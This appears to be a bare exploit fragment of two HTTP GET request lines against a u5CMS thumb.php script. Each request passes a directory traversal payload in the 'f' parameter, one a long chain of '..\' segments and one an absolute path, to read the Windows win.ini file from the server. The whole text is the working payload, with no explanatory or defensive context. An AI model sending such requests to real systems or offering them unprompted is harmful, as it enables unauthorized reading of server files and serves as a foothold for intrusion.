/u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1